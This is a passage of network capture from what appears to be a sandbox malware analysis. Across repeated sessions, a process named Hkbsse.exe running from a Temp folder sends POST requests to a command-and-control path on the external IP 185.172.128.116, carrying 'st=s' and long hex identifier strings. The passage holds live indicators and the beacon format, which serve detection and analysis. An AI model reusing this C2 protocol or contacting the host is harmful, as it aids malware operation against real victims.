                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                        Data Ascii: st=s
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:50.681734085 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:07:50 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Refresh: 0; url = Login.php
                                                                                                                                                                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 1 0
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:50.685362101 CEST311OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 156
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 35 34 31 43 43 46 38 31 32 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43
                                                                                                                                                                                                                                        Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5541CCF812A2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:50.878304958 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:07:50 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        54192.168.2.559026185.172.128.116807684C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:50.986422062 CEST157OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                        Data Ascii: st=s
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:51.656909943 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:07:51 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Refresh: 0; url = Login.php
                                                                                                                                                                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 1 0
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:51.658049107 CEST311OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 156
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 35 34 31 43 43 46 38 31 32 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43
                                                                                                                                                                                                                                        Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5541CCF812A2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:51.854079962 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:07:51 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        55192.168.2.559027185.172.128.116807684C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:52.215167999 CEST157OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                        Data Ascii: st=s
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:52.867495060 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:07:52 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Refresh: 0; url = Login.php
                                                                                                                                                                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 1 0
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:52.868439913 CEST311OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 156
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 35 34 31 43 43 46 38 31 32 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43
                                                                                                                                                                                                                                        Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5541CCF812A2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:53.071759939 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:07:52 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        56192.168.2.559028185.172.128.116807684C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:53.189321995 CEST157OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                        Data Ascii: st=s
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:53.821049929 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:07:53 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Refresh: 0; url = Login.php
                                                                                                                                                                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 1 0
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:53.822541952 CEST311OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 156
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 35 34 31 43 43 46 38 31 32 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43
                                                                                                                                                                                                                                        Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5541CCF812A2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:54.017277956 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:07:53 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        57192.168.2.559029185.172.128.116807684C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:54.149005890 CEST157OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                        Data Ascii: st=s
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:55.047118902 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:07:54 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Refresh: 0; url = Login.php
                                                                                                                                                                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 1 0
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:55.047369003 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:07:54 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Refresh: 0; url = Login.php
                                                                                                                                                                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 1 0
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:55.048156023 CEST311OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 156
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 35 34 31 43 43 46 38 31 32 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43
                                                                                                                                                                                                                                        Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5541CCF812A2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:55.240005016 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:07:55 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        58192.168.2.559030185.172.128.116807684C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:55.360863924 CEST157OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                        Data Ascii: st=s
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:56.003593922 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:07:55 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Refresh: 0; url = Login.php
                                                                                                                                                                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 1 0
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:56.004570961 CEST311OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 156
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 35 34 31 43 43 46 38 31 32 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43
                                                                                                                                                                                                                                        Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5541CCF812A2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:56.197310925 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:07:56 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        59192.168.2.559031185.172.128.116807684C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:56.486185074 CEST157OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                        Data Ascii: st=s
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:57.123281956 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:07:57 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Refresh: 0; url = Login.php
                                                                                                                                                                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 1 0
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:57.125154018 CEST311OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 156
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 35 34 31 43 43 46 38 31 32 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43
                                                                                                                                                                                                                                        Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5541CCF812A2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:57.322670937 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:07:57 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        60192.168.2.559032185.172.128.116807684C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:57.438997984 CEST157OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                        Data Ascii: st=s
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:58.110021114 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:07:58 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Refresh: 0; url = Login.php
                                                                                                                                                                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 1 0
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:58.110970020 CEST311OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 156
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 35 34 31 43 43 46 38 31 32 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43
                                                                                                                                                                                                                                        Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5541CCF812A2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:58.311094999 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:07:58 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        61192.168.2.559033185.172.128.116807684C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:58.661000967 CEST157OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                        Data Ascii: st=s
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:59.254652977 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:07:59 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Refresh: 0; url = Login.php
                                                                                                                                                                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 1 0
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:59.255615950 CEST311OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 156
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 35 34 31 43 43 46 38 31 32 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43
                                                                                                                                                                                                                                        Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5541CCF812A2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:59.449348927 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:07:59 GMT
